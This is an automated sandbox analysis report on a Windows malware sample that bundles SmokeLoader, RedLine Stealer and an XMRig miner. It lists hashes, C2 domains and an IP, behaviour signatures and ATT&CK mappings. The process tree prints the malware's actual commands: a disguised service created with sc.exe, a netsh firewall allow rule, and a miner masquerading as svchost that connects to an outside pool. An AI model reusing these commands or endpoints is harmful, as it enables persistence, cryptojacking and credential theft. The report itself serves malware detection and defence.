Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    06-10-2021 17:57

General

  • Target

    c8dac6153077c6b6b6669eb7b18c21b7cfe374d4ac17bd32786d8a5826faa47b.exe

  • Size

    199KB

  • MD5

    d4e179701494a88ee3a32b3bd22117b6

  • SHA1

    98bda43471a64e9b73793bc800258f671dd804f9

  • SHA256

    c8dac6153077c6b6b6669eb7b18c21b7cfe374d4ac17bd32786d8a5826faa47b

  • SHA512

    2283a27d1ea573dd916c8c4ebd2ddbfd2a237dd06a9081cc75f3fb87909ddba948537054239a8630dc2e52e239823958bb0ba9e6b93dcda259ed24326c864f50

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://fiskahlilian16.top/

http://paishancho17.top/

http://ydiannetter18.top/

http://azarehanelle19.top/

http://quericeriant20.top/

rc4.i32

Extracted

Family

redline

Botnet

777

C2

93.115.20.139:28978

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload (3 IoCs)
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass (2 TTPs)
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • xmrig

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)
  • XMRig Miner Payload (3 IoCs)
  • Creates new service(s) (1 TTP)
  • Downloads MZ/PE file
  • Executes dropped EXE (8 IoCs)
  • Modifies Windows Firewall (1 TTP)
  • Sets service image path in registry (2 TTPs)
  • Checks BIOS information in registry (2 TTPs, 2 IoCs)

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself (1 IoC)
  • Reads user/profile data of web browsers (2 TTPs)

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer (2 IoCs)

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
  • Checks installed software on the system (1 TTP)

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled (1 TTP, 1 IoC)
  • Drops file in System32 directory (2 IoCs)
  • Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  • Suspicious use of SetThreadContext (5 IoCs)
  • Launches sc.exe

    sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) (3 TTPs, 6 IoCs)

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS (12 IoCs)
  • Modifies registry class (2 IoCs)
  • Modifies system certificate store (2 TTPs, 5 IoCs)
  • Suspicious behavior: EnumeratesProcesses (64 IoCs)
  • Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  • Suspicious behavior: MapViewOfSection (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (61 IoCs)
  • Suspicious use of FindShellTrayWindow (8 IoCs)
  • Suspicious use of WriteProcessMemory (63 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\c8dac6153077c6b6b6669eb7b18c21b7cfe374d4ac17bd32786d8a5826faa47b.exe
    "C:\Users\Admin\AppData\Local\Temp\c8dac6153077c6b6b6669eb7b18c21b7cfe374d4ac17bd32786d8a5826faa47b.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:740
    • C:\Users\Admin\AppData\Local\Temp\c8dac6153077c6b6b6669eb7b18c21b7cfe374d4ac17bd32786d8a5826faa47b.exe
      "C:\Users\Admin\AppData\Local\Temp\c8dac6153077c6b6b6669eb7b18c21b7cfe374d4ac17bd32786d8a5826faa47b.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:860
  • C:\Users\Admin\AppData\Local\Temp\B31E.exe
    C:\Users\Admin\AppData\Local\Temp\B31E.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1040
    • C:\Users\Admin\AppData\Local\Temp\B31E.exe
      C:\Users\Admin\AppData\Local\Temp\B31E.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:1636
  • C:\Users\Admin\AppData\Local\Temp\B68A.exe
    C:\Users\Admin\AppData\Local\Temp\B68A.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1092
    • C:\Users\Admin\AppData\Local\Temp\B68A.exe
      C:\Users\Admin\AppData\Local\Temp\B68A.exe
      2⤵
      • Executes dropped EXE
      PID:2336
    • C:\Users\Admin\AppData\Local\Temp\B68A.exe
      C:\Users\Admin\AppData\Local\Temp\B68A.exe
      2⤵
      • Executes dropped EXE
      • Modifies system certificate store
      • Suspicious use of AdjustPrivilegeToken
      PID:2840
  • C:\Users\Admin\AppData\Local\Temp\BE7A.exe
    C:\Users\Admin\AppData\Local\Temp\BE7A.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:1796
  • C:\Users\Admin\AppData\Local\Temp\C67A.exe
    C:\Users\Admin\AppData\Local\Temp\C67A.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:2612
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ponrmlmn\
      2⤵
        PID:3964
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\brrrgxdv.exe" C:\Windows\SysWOW64\ponrmlmn\
        2⤵
          PID:2228
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create ponrmlmn binPath= "C:\Windows\SysWOW64\ponrmlmn\brrrgxdv.exe /d\"C:\Users\Admin\AppData\Local\Temp\C67A.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:540
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description ponrmlmn "wifi internet conection"
            2⤵
              PID:3876
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start ponrmlmn
              2⤵
                PID:2820
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1168
              • C:\Windows\SysWOW64\ponrmlmn\brrrgxdv.exe
                C:\Windows\SysWOW64\ponrmlmn\brrrgxdv.exe /d"C:\Users\Admin\AppData\Local\Temp\C67A.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2232
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:4016
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1924

MITRE ATT&CK Matrix ATT&CK v6

  • Persistence
    New Service (T1050): 1
    Modify Existing Service (T1031): 1
    Registry Run Keys / Startup Folder (T1060): 1
  • Privilege Escalation
    New Service (T1050): 1
  • Defense Evasion
    Disabling Security Tools (T1089): 1
    Modify Registry (T1112): 3
    Virtualization/Sandbox Evasion (T1497): 1
    Install Root Certificate (T1130): 1
  • Credential Access
    Credentials in Files (T1081): 2
  • Discovery
    Query Registry (T1012): 4
    Virtualization/Sandbox Evasion (T1497): 1
    System Information Discovery (T1082): 4
    Peripheral Device Discovery (T1120): 1
  • Collection
    Data from Local System (T1005): 2

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\B68A.exe.log
                MD5

                41fbed686f5700fc29aaccf83e8ba7fd

                SHA1

                5271bc29538f11e42a3b600c8dc727186e912456

                SHA256

                df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                SHA512

                234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

              • C:\Users\Admin\AppData\Local\Temp\B31E.exe
                MD5

                d4e179701494a88ee3a32b3bd22117b6

                SHA1

                98bda43471a64e9b73793bc800258f671dd804f9

                SHA256

                c8dac6153077c6b6b6669eb7b18c21b7cfe374d4ac17bd32786d8a5826faa47b

                SHA512

                2283a27d1ea573dd916c8c4ebd2ddbfd2a237dd06a9081cc75f3fb87909ddba948537054239a8630dc2e52e239823958bb0ba9e6b93dcda259ed24326c864f50

              • C:\Users\Admin\AppData\Local\Temp\B68A.exe
                MD5

                4e77860c3d327d661d481433cd7c2b7f

                SHA1

                27ec68f26eb1b36044d71a64d2d399b06d2248a4

                SHA256

                48f51e29fc5411f2193d99ff98a4c6d9a6c92623125255442a0620e12993c747

                SHA512

                7a3b2c56911e82f17bca41fc4260c81a8287244497e88e1bdb6017901a632402d796a0f207402ed3ca975d6c8d37f2575057829f0459ab9616efcefb274429ca

              • C:\Users\Admin\AppData\Local\Temp\BE7A.exe
                MD5

                d0ec4cce8f1b67dc68a8ffa16915e0ba

                SHA1

                25c0736405030f1704c52684ef4f64617dbf669a

                SHA256

                0d2e9322d0fc40f66ab6e80d0dce1b9131cefff5ac3a7d95d3b8f8d07b5523bd

                SHA512

                d5d5e30dd8c4d4f782016127436ef822774d86de54470c903c47a5080607180d571607c0afc54e707f95c879716055249aefae3bfd2549ee8a751ae818b6b022

              • C:\Users\Admin\AppData\Local\Temp\C67A.exe
                MD5

                a4efcb567fd2172148ecc823d2cb7200

                SHA1

                21b127ee0ddf472b2a1ae31a2d77254c44701fcb

                SHA256

                7947dfc0ed0d455086f2db611fc810a0616b24b8230d6ff82d0d7f50e4b80f96

                SHA512

                e76e88a557ba6ca1bd864e40c434de73a160addc9d102594dc72fb99911ecd7940135d35b3c3e5d01616364438f1df7980a76e3de63a49b1403e7974b500a322

              • C:\Users\Admin\AppData\Local\Temp\brrrgxdv.exe
                MD5

                1115ef2f3bdd6dc9c13a8a747c3f8df2

                SHA1

                73db55e6b4603b008a5397bb15c7150f7ab438c5

                SHA256

                d65cbaca0283839665e1de6a496c4e4c7661b737e1650ea0793d8937ce2384ad

                SHA512

                4545fb29ee0a07c1f7e6ae5255c1077a8bfdbc3f165ccc23420bfaae7cdb7e03d39a61dd19d5e3a147767c91253f8e2f3b1b6df8913f424d0d151adfcb29bcc1

              • C:\Windows\SysWOW64\ponrmlmn\brrrgxdv.exe
                MD5

                1115ef2f3bdd6dc9c13a8a747c3f8df2

                SHA1

                73db55e6b4603b008a5397bb15c7150f7ab438c5

                SHA256

                d65cbaca0283839665e1de6a496c4e4c7661b737e1650ea0793d8937ce2384ad

                SHA512

                4545fb29ee0a07c1f7e6ae5255c1077a8bfdbc3f165ccc23420bfaae7cdb7e03d39a61dd19d5e3a147767c91253f8e2f3b1b6df8913f424d0d151adfcb29bcc1
